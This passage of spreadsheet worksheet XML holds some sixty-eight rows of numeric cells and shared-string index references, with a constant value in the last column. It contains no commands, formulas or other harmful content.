      <c r="D18960" s="2">
        <v>1.0</v>
      </c>
      <c r="E18960" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18960" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18961" ht="15.75" customHeight="1">
      <c r="A18961" s="1">
        <v>4710.0</v>
      </c>
      <c r="B18961" s="2">
        <v>4.3260444E7</v>
      </c>
      <c r="C18961" s="2" t="s">
        <v>18271</v>
      </c>
      <c r="D18961" s="2">
        <v>1.0</v>
      </c>
      <c r="E18961" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18961" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18962" ht="15.75" customHeight="1">
      <c r="A18962" s="1">
        <v>5015.0</v>
      </c>
      <c r="B18962" s="2">
        <v>4.4200367E7</v>
      </c>
      <c r="C18962" s="2" t="s">
        <v>18272</v>
      </c>
      <c r="D18962" s="2">
        <v>1.0</v>
      </c>
      <c r="E18962" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18962" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18963" ht="15.75" customHeight="1">
      <c r="A18963" s="1">
        <v>5193.0</v>
      </c>
      <c r="B18963" s="2">
        <v>4.4831205E7</v>
      </c>
      <c r="C18963" s="2" t="s">
        <v>18273</v>
      </c>
      <c r="D18963" s="2">
        <v>1.0</v>
      </c>
      <c r="E18963" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18963" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18964" ht="15.75" customHeight="1">
      <c r="A18964" s="1">
        <v>5257.0</v>
      </c>
      <c r="B18964" s="2">
        <v>4.5106229E7</v>
      </c>
      <c r="C18964" s="2" t="s">
        <v>18274</v>
      </c>
      <c r="D18964" s="2">
        <v>1.0</v>
      </c>
      <c r="E18964" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18964" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18965" ht="15.75" customHeight="1">
      <c r="A18965" s="1">
        <v>5492.0</v>
      </c>
      <c r="B18965" s="2">
        <v>4.5775107E7</v>
      </c>
      <c r="C18965" s="2" t="s">
        <v>18275</v>
      </c>
      <c r="D18965" s="2">
        <v>1.0</v>
      </c>
      <c r="E18965" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18965" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18966" ht="15.75" customHeight="1">
      <c r="A18966" s="1">
        <v>5506.0</v>
      </c>
      <c r="B18966" s="2">
        <v>4.5830061E7</v>
      </c>
      <c r="C18966" s="2" t="s">
        <v>18276</v>
      </c>
      <c r="D18966" s="2">
        <v>1.0</v>
      </c>
      <c r="E18966" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18966" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18967" ht="15.75" customHeight="1">
      <c r="A18967" s="1">
        <v>6100.0</v>
      </c>
      <c r="B18967" s="2">
        <v>4.7707484E7</v>
      </c>
      <c r="C18967" s="2" t="s">
        <v>18277</v>
      </c>
      <c r="D18967" s="2">
        <v>1.0</v>
      </c>
      <c r="E18967" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18967" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18968" ht="15.75" customHeight="1">
      <c r="A18968" s="1">
        <v>7100.0</v>
      </c>
      <c r="B18968" s="2">
        <v>5.0344799E7</v>
      </c>
      <c r="C18968" s="2" t="s">
        <v>18278</v>
      </c>
      <c r="D18968" s="2">
        <v>1.0</v>
      </c>
      <c r="E18968" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18968" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18969" ht="15.75" customHeight="1">
      <c r="A18969" s="1">
        <v>7285.0</v>
      </c>
      <c r="B18969" s="2">
        <v>5.0793277E7</v>
      </c>
      <c r="C18969" s="2" t="s">
        <v>18279</v>
      </c>
      <c r="D18969" s="2">
        <v>1.0</v>
      </c>
      <c r="E18969" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18969" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18970" ht="15.75" customHeight="1">
      <c r="A18970" s="1">
        <v>7619.0</v>
      </c>
      <c r="B18970" s="2">
        <v>5.1713773E7</v>
      </c>
      <c r="C18970" s="2" t="s">
        <v>18280</v>
      </c>
      <c r="D18970" s="2">
        <v>1.0</v>
      </c>
      <c r="E18970" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18970" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18971" ht="15.75" customHeight="1">
      <c r="A18971" s="1">
        <v>8252.0</v>
      </c>
      <c r="B18971" s="2">
        <v>5.3379106E7</v>
      </c>
      <c r="C18971" s="2" t="s">
        <v>18281</v>
      </c>
      <c r="D18971" s="2">
        <v>1.0</v>
      </c>
      <c r="E18971" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18971" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18972" ht="15.75" customHeight="1">
      <c r="A18972" s="1">
        <v>8276.0</v>
      </c>
      <c r="B18972" s="2">
        <v>5.346863E7</v>
      </c>
      <c r="C18972" s="2" t="s">
        <v>18282</v>
      </c>
      <c r="D18972" s="2">
        <v>1.0</v>
      </c>
      <c r="E18972" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18972" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18973" ht="15.75" customHeight="1">
      <c r="A18973" s="1">
        <v>8337.0</v>
      </c>
      <c r="B18973" s="2">
        <v>5.3695278E7</v>
      </c>
      <c r="C18973" s="2" t="s">
        <v>18283</v>
      </c>
      <c r="D18973" s="2">
        <v>1.0</v>
      </c>
      <c r="E18973" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18973" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18974" ht="15.75" customHeight="1">
      <c r="A18974" s="1">
        <v>8507.0</v>
      </c>
      <c r="B18974" s="2">
        <v>5.4051945E7</v>
      </c>
      <c r="C18974" s="2" t="s">
        <v>18284</v>
      </c>
      <c r="D18974" s="2">
        <v>1.0</v>
      </c>
      <c r="E18974" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18974" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18975" ht="15.75" customHeight="1">
      <c r="A18975" s="1">
        <v>9171.0</v>
      </c>
      <c r="B18975" s="2">
        <v>5.5336854E7</v>
      </c>
      <c r="C18975" s="2" t="s">
        <v>18285</v>
      </c>
      <c r="D18975" s="2">
        <v>1.0</v>
      </c>
      <c r="E18975" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18975" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18976" ht="15.75" customHeight="1">
      <c r="A18976" s="1">
        <v>9330.0</v>
      </c>
      <c r="B18976" s="2">
        <v>5.5606603E7</v>
      </c>
      <c r="C18976" s="2" t="s">
        <v>18286</v>
      </c>
      <c r="D18976" s="2">
        <v>1.0</v>
      </c>
      <c r="E18976" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18976" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18977" ht="15.75" customHeight="1">
      <c r="A18977" s="1">
        <v>9331.0</v>
      </c>
      <c r="B18977" s="2">
        <v>5.561835E7</v>
      </c>
      <c r="C18977" s="2" t="s">
        <v>18287</v>
      </c>
      <c r="D18977" s="2">
        <v>1.0</v>
      </c>
      <c r="E18977" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18977" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18978" ht="15.75" customHeight="1">
      <c r="A18978" s="1">
        <v>9553.0</v>
      </c>
      <c r="B18978" s="2">
        <v>5.6040429E7</v>
      </c>
      <c r="C18978" s="2" t="s">
        <v>18288</v>
      </c>
      <c r="D18978" s="2">
        <v>1.0</v>
      </c>
      <c r="E18978" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18978" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18979" ht="15.75" customHeight="1">
      <c r="A18979" s="1">
        <v>9773.0</v>
      </c>
      <c r="B18979" s="2">
        <v>5.650134E7</v>
      </c>
      <c r="C18979" s="2" t="s">
        <v>18289</v>
      </c>
      <c r="D18979" s="2">
        <v>1.0</v>
      </c>
      <c r="E18979" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18979" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18980" ht="15.75" customHeight="1">
      <c r="A18980" s="1">
        <v>9812.0</v>
      </c>
      <c r="B18980" s="2">
        <v>5.6611893E7</v>
      </c>
      <c r="C18980" s="2" t="s">
        <v>18290</v>
      </c>
      <c r="D18980" s="2">
        <v>1.0</v>
      </c>
      <c r="E18980" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18980" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18981" ht="15.75" customHeight="1">
      <c r="A18981" s="1">
        <v>9840.0</v>
      </c>
      <c r="B18981" s="2">
        <v>5.666263E7</v>
      </c>
      <c r="C18981" s="2" t="s">
        <v>18291</v>
      </c>
      <c r="D18981" s="2">
        <v>1.0</v>
      </c>
      <c r="E18981" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18981" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18982" ht="15.75" customHeight="1">
      <c r="A18982" s="1">
        <v>9909.0</v>
      </c>
      <c r="B18982" s="2">
        <v>5.6787074E7</v>
      </c>
      <c r="C18982" s="2" t="s">
        <v>18292</v>
      </c>
      <c r="D18982" s="2">
        <v>1.0</v>
      </c>
      <c r="E18982" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18982" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18983" ht="15.75" customHeight="1">
      <c r="A18983" s="1">
        <v>10037.0</v>
      </c>
      <c r="B18983" s="2">
        <v>5.7060719E7</v>
      </c>
      <c r="C18983" s="2" t="s">
        <v>18293</v>
      </c>
      <c r="D18983" s="2">
        <v>1.0</v>
      </c>
      <c r="E18983" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18983" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18984" ht="15.75" customHeight="1">
      <c r="A18984" s="1">
        <v>10105.0</v>
      </c>
      <c r="B18984" s="2">
        <v>5.7231721E7</v>
      </c>
      <c r="C18984" s="2" t="s">
        <v>18294</v>
      </c>
      <c r="D18984" s="2">
        <v>1.0</v>
      </c>
      <c r="E18984" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18984" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18985" ht="15.75" customHeight="1">
      <c r="A18985" s="1">
        <v>10112.0</v>
      </c>
      <c r="B18985" s="2">
        <v>5.724535E7</v>
      </c>
      <c r="C18985" s="2" t="s">
        <v>18295</v>
      </c>
      <c r="D18985" s="2">
        <v>1.0</v>
      </c>
      <c r="E18985" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18985" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18986" ht="15.75" customHeight="1">
      <c r="A18986" s="1">
        <v>10282.0</v>
      </c>
      <c r="B18986" s="2">
        <v>5.7628197E7</v>
      </c>
      <c r="C18986" s="2" t="s">
        <v>18296</v>
      </c>
      <c r="D18986" s="2">
        <v>1.0</v>
      </c>
      <c r="E18986" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18986" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18987" ht="15.75" customHeight="1">
      <c r="A18987" s="1">
        <v>10428.0</v>
      </c>
      <c r="B18987" s="2">
        <v>1.0331374E7</v>
      </c>
      <c r="C18987" s="2" t="s">
        <v>18297</v>
      </c>
      <c r="D18987" s="2">
        <v>1.0</v>
      </c>
      <c r="E18987" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18987" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18988" ht="15.75" customHeight="1">
      <c r="A18988" s="1">
        <v>10473.0</v>
      </c>
      <c r="B18988" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C18988" s="2" t="s">
        <v>18298</v>
      </c>
      <c r="D18988" s="2">
        <v>1.0</v>
      </c>
      <c r="E18988" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18988" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18989" ht="15.75" customHeight="1">
      <c r="A18989" s="1">
        <v>11216.0</v>
      </c>
      <c r="B18989" s="2">
        <v>2.0221524E7</v>
      </c>
      <c r="C18989" s="2" t="s">
        <v>18299</v>
      </c>
      <c r="D18989" s="2">
        <v>1.0</v>
      </c>
      <c r="E18989" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18989" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18990" ht="15.75" customHeight="1">
      <c r="A18990" s="1">
        <v>11809.0</v>
      </c>
      <c r="B18990" s="2">
        <v>2.4460991E7</v>
      </c>
      <c r="C18990" s="2" t="s">
        <v>18300</v>
      </c>
      <c r="D18990" s="2">
        <v>1.0</v>
      </c>
      <c r="E18990" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18990" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18991" ht="15.75" customHeight="1">
      <c r="A18991" s="1">
        <v>11906.0</v>
      </c>
      <c r="B18991" s="2">
        <v>2.5208596E7</v>
      </c>
      <c r="C18991" s="2" t="s">
        <v>18301</v>
      </c>
      <c r="D18991" s="2">
        <v>1.0</v>
      </c>
      <c r="E18991" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18991" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18992" ht="15.75" customHeight="1">
      <c r="A18992" s="1">
        <v>11914.0</v>
      </c>
      <c r="B18992" s="2">
        <v>2.5255177E7</v>
      </c>
      <c r="C18992" s="2" t="s">
        <v>18302</v>
      </c>
      <c r="D18992" s="2">
        <v>1.0</v>
      </c>
      <c r="E18992" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18992" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18993" ht="15.75" customHeight="1">
      <c r="A18993" s="1">
        <v>12785.0</v>
      </c>
      <c r="B18993" s="2">
        <v>3.1364723E7</v>
      </c>
      <c r="C18993" s="2" t="s">
        <v>18303</v>
      </c>
      <c r="D18993" s="2">
        <v>1.0</v>
      </c>
      <c r="E18993" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18993" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18994" ht="15.75" customHeight="1">
      <c r="A18994" s="1">
        <v>12885.0</v>
      </c>
      <c r="B18994" s="2">
        <v>3.201507E7</v>
      </c>
      <c r="C18994" s="2" t="s">
        <v>18304</v>
      </c>
      <c r="D18994" s="2">
        <v>1.0</v>
      </c>
      <c r="E18994" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18994" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18995" ht="15.75" customHeight="1">
      <c r="A18995" s="1">
        <v>13328.0</v>
      </c>
      <c r="B18995" s="2">
        <v>3.4631426E7</v>
      </c>
      <c r="C18995" s="2" t="s">
        <v>18305</v>
      </c>
      <c r="D18995" s="2">
        <v>1.0</v>
      </c>
      <c r="E18995" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18995" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18996" ht="15.75" customHeight="1">
      <c r="A18996" s="1">
        <v>13368.0</v>
      </c>
      <c r="B18996" s="2">
        <v>3.482655E7</v>
      </c>
      <c r="C18996" s="2" t="s">
        <v>18306</v>
      </c>
      <c r="D18996" s="2">
        <v>1.0</v>
      </c>
      <c r="E18996" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18996" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18997" ht="15.75" customHeight="1">
      <c r="A18997" s="1">
        <v>13441.0</v>
      </c>
      <c r="B18997" s="2">
        <v>3.512159E7</v>
      </c>
      <c r="C18997" s="2" t="s">
        <v>18307</v>
      </c>
      <c r="D18997" s="2">
        <v>1.0</v>
      </c>
      <c r="E18997" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18997" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18998" ht="15.75" customHeight="1">
      <c r="A18998" s="1">
        <v>14004.0</v>
      </c>
      <c r="B18998" s="2">
        <v>3.738699E7</v>
      </c>
      <c r="C18998" s="2" t="s">
        <v>18308</v>
      </c>
      <c r="D18998" s="2">
        <v>1.0</v>
      </c>
      <c r="E18998" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18998" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18999" ht="15.75" customHeight="1">
      <c r="A18999" s="1">
        <v>14057.0</v>
      </c>
      <c r="B18999" s="2">
        <v>3.7551913E7</v>
      </c>
      <c r="C18999" s="2" t="s">
        <v>18309</v>
      </c>
      <c r="D18999" s="2">
        <v>1.0</v>
      </c>
      <c r="E18999" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18999" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19000" ht="15.75" customHeight="1">
      <c r="A19000" s="1">
        <v>14125.0</v>
      </c>
      <c r="B19000" s="2">
        <v>3.785064E7</v>
      </c>
      <c r="C19000" s="2" t="s">
        <v>18310</v>
      </c>
      <c r="D19000" s="2">
        <v>1.0</v>
      </c>
      <c r="E19000" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19000" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19001" ht="15.75" customHeight="1">
      <c r="A19001" s="1">
        <v>14422.0</v>
      </c>
      <c r="B19001" s="2">
        <v>3.9256156E7</v>
      </c>
      <c r="C19001" s="2" t="s">
        <v>18311</v>
      </c>
      <c r="D19001" s="2">
        <v>1.0</v>
      </c>
      <c r="E19001" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19001" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19002" ht="15.75" customHeight="1">
      <c r="A19002" s="1">
        <v>14447.0</v>
      </c>
      <c r="B19002" s="2">
        <v>3.9372555E7</v>
      </c>
      <c r="C19002" s="2" t="s">
        <v>18311</v>
      </c>
      <c r="D19002" s="2">
        <v>1.0</v>
      </c>
      <c r="E19002" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19002" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19003" ht="15.75" customHeight="1">
      <c r="A19003" s="1">
        <v>14858.0</v>
      </c>
      <c r="B19003" s="2">
        <v>4.1065852E7</v>
      </c>
      <c r="C19003" s="2" t="s">
        <v>18312</v>
      </c>
      <c r="D19003" s="2">
        <v>1.0</v>
      </c>
      <c r="E19003" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19003" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19004" ht="15.75" customHeight="1">
      <c r="A19004" s="1">
        <v>15722.0</v>
      </c>
      <c r="B19004" s="2">
        <v>4.4001728E7</v>
      </c>
      <c r="C19004" s="2" t="s">
        <v>18313</v>
      </c>
      <c r="D19004" s="2">
        <v>1.0</v>
      </c>
      <c r="E19004" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19004" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19005" ht="15.75" customHeight="1">
      <c r="A19005" s="1">
        <v>15863.0</v>
      </c>
      <c r="B19005" s="2">
        <v>4.4500741E7</v>
      </c>
      <c r="C19005" s="2" t="s">
        <v>18314</v>
      </c>
      <c r="D19005" s="2">
        <v>1.0</v>
      </c>
      <c r="E19005" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19005" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19006" ht="15.75" customHeight="1">
      <c r="A19006" s="1">
        <v>16607.0</v>
      </c>
      <c r="B19006" s="2">
        <v>4.7045199E7</v>
      </c>
      <c r="C19006" s="2" t="s">
        <v>18315</v>
      </c>
      <c r="D19006" s="2">
        <v>1.0</v>
      </c>
      <c r="E19006" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19006" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19007" ht="15.75" customHeight="1">
      <c r="A19007" s="1">
        <v>16740.0</v>
      </c>
      <c r="B19007" s="2">
        <v>4.7548193E7</v>
      </c>
      <c r="C19007" s="2" t="s">
        <v>18316</v>
      </c>
      <c r="D19007" s="2">
        <v>1.0</v>
      </c>
      <c r="E19007" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19007" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19008" ht="15.75" customHeight="1">
      <c r="A19008" s="1">
        <v>17803.0</v>
      </c>
      <c r="B19008" s="2">
        <v>5.0817027E7</v>
      </c>
      <c r="C19008" s="2" t="s">
        <v>18317</v>
      </c>
      <c r="D19008" s="2">
        <v>1.0</v>
      </c>
      <c r="E19008" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19008" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19009" ht="15.75" customHeight="1">
      <c r="A19009" s="1">
        <v>18155.0</v>
      </c>
      <c r="B19009" s="2">
        <v>5.1873429E7</v>
      </c>
      <c r="C19009" s="2" t="s">
        <v>18318</v>
      </c>
      <c r="D19009" s="2">
        <v>1.0</v>
      </c>
      <c r="E19009" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19009" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19010" ht="15.75" customHeight="1">
      <c r="A19010" s="1">
        <v>18238.0</v>
      </c>
      <c r="B19010" s="2">
        <v>5.2140068E7</v>
      </c>
      <c r="C19010" s="2" t="s">
        <v>18319</v>
      </c>
      <c r="D19010" s="2">
        <v>1.0</v>
      </c>
      <c r="E19010" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19010" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19011" ht="15.75" customHeight="1">
      <c r="A19011" s="1">
        <v>18347.0</v>
      </c>
      <c r="B19011" s="2">
        <v>5.2477419E7</v>
      </c>
      <c r="C19011" s="2" t="s">
        <v>18320</v>
      </c>
      <c r="D19011" s="2">
        <v>1.0</v>
      </c>
      <c r="E19011" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19011" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19012" ht="15.75" customHeight="1">
      <c r="A19012" s="1">
        <v>18808.0</v>
      </c>
      <c r="B19012" s="2">
        <v>5.3889957E7</v>
      </c>
      <c r="C19012" s="2" t="s">
        <v>18321</v>
      </c>
      <c r="D19012" s="2">
        <v>1.0</v>
      </c>
      <c r="E19012" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19012" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19013" ht="15.75" customHeight="1">
      <c r="A19013" s="1">
        <v>18951.0</v>
      </c>
      <c r="B19013" s="2">
        <v>5.4345588E7</v>
      </c>
      <c r="C19013" s="2" t="s">
        <v>18322</v>
      </c>
      <c r="D19013" s="2">
        <v>1.0</v>
      </c>
      <c r="E19013" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19013" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19014" ht="15.75" customHeight="1">
      <c r="A19014" s="1">
        <v>19075.0</v>
      </c>
      <c r="B19014" s="2">
        <v>5.461725E7</v>
      </c>
      <c r="C19014" s="2" t="s">
        <v>18323</v>
      </c>
      <c r="D19014" s="2">
        <v>1.0</v>
      </c>
      <c r="E19014" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19014" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19015" ht="15.75" customHeight="1">
      <c r="A19015" s="1">
        <v>19613.0</v>
      </c>
      <c r="B19015" s="2">
        <v>5.6203388E7</v>
      </c>
      <c r="C19015" s="2" t="s">
        <v>18324</v>
      </c>
      <c r="D19015" s="2">
        <v>1.0</v>
      </c>
      <c r="E19015" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19015" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19016" ht="15.75" customHeight="1">
      <c r="A19016" s="1">
        <v>19643.0</v>
      </c>
      <c r="B19016" s="2">
        <v>5.6298971E7</v>
      </c>
      <c r="C19016" s="2" t="s">
        <v>18325</v>
      </c>
      <c r="D19016" s="2">
        <v>1.0</v>
      </c>
      <c r="E19016" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19016" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19017" ht="15.75" customHeight="1">
      <c r="A19017" s="1">
        <v>19677.0</v>
      </c>
      <c r="B19017" s="2">
        <v>5.643072E7</v>
      </c>
      <c r="C19017" s="2" t="s">
        <v>18326</v>
      </c>
      <c r="D19017" s="2">
        <v>1.0</v>
      </c>
      <c r="E19017" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19017" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19018" ht="15.75" customHeight="1">
      <c r="A19018" s="1">
        <v>20036.0</v>
      </c>
      <c r="B19018" s="2">
        <v>7320667.0</v>
      </c>
      <c r="C19018" s="2" t="s">
        <v>18327</v>
      </c>
      <c r="D19018" s="2">
        <v>1.0</v>
      </c>
      <c r="E19018" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19018" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19019" ht="15.75" customHeight="1">
      <c r="A19019" s="1">
        <v>20463.0</v>
      </c>
      <c r="B19019" s="2">
        <v>1.2699931E7</v>
      </c>
      <c r="C19019" s="2" t="s">
        <v>18328</v>
      </c>
      <c r="D19019" s="2">
        <v>1.0</v>
      </c>
      <c r="E19019" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19019" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19020" ht="15.75" customHeight="1">
      <c r="A19020" s="1">
        <v>20480.0</v>
      </c>
      <c r="B19020" s="2">
        <v>1.2829043E7</v>
      </c>
      <c r="C19020" s="2" t="s">
        <v>18329</v>
      </c>
      <c r="D19020" s="2">
        <v>1.0</v>
      </c>
      <c r="E19020" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19020" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19021" ht="15.75" customHeight="1">
      <c r="A19021" s="1">
        <v>20777.0</v>
      </c>
      <c r="B19021" s="2">
        <v>1.5008066E7</v>
      </c>
      <c r="C19021" s="2" t="s">
        <v>18330</v>
      </c>
      <c r="D19021" s="2">
        <v>1.0</v>
      </c>
      <c r="E19021" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19021" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19022" ht="15.75" customHeight="1">
      <c r="A19022" s="1">
        <v>20871.0</v>
      </c>
      <c r="B19022" s="2">
        <v>1.5937159E7</v>
      </c>
      <c r="C19022" s="2" t="s">
        <v>18331</v>
      </c>
      <c r="D19022" s="2">
        <v>1.0</v>
      </c>
      <c r="E19022" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19022" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19023" ht="15.75" customHeight="1">
      <c r="A19023" s="1">
        <v>20877.0</v>
      </c>
      <c r="B19023" s="2">
        <v>1.6031239E7</v>
      </c>
      <c r="C19023" s="2" t="s">
        <v>18332</v>
      </c>
      <c r="D19023" s="2">
        <v>1.0</v>
      </c>
      <c r="E19023" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19023" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19024" ht="15.75" customHeight="1">
      <c r="A19024" s="1">
        <v>21189.0</v>
      </c>
      <c r="B19024" s="2">
        <v>1.9315297E7</v>
      </c>
      <c r="C19024" s="2" t="s">
        <v>18333</v>
      </c>
      <c r="D19024" s="2">
        <v>1.0</v>
      </c>
      <c r="E19024" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19024" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19025" ht="15.75" customHeight="1">
      <c r="A19025" s="1">
        <v>21406.0</v>
      </c>
      <c r="B19025" s="2">
        <v>2.1954134E7</v>
      </c>
      <c r="C19025" s="2" t="s">
        <v>18334</v>
      </c>
      <c r="D19025" s="2">
        <v>1.0</v>
      </c>
      <c r="E19025" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19025" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19026" ht="15.75" customHeight="1">
      <c r="A19026" s="1">
        <v>21486.0</v>
      </c>
      <c r="B19026" s="2">
        <v>2.3043536E7</v>
      </c>
      <c r="C19026" s="2" t="s">
        <v>18335</v>
      </c>
      <c r="D19026" s="2">
        <v>1.0</v>
      </c>
      <c r="E19026" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19026" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19027" ht="15.75" customHeight="1">
      <c r="A19027" s="1">
        <v>22601.0</v>
      </c>
      <c r="B19027" s="2">
        <v>3.9479271E7</v>
      </c>
      <c r="C19027" s="2" t="s">
        <v>18336</v>
      </c>
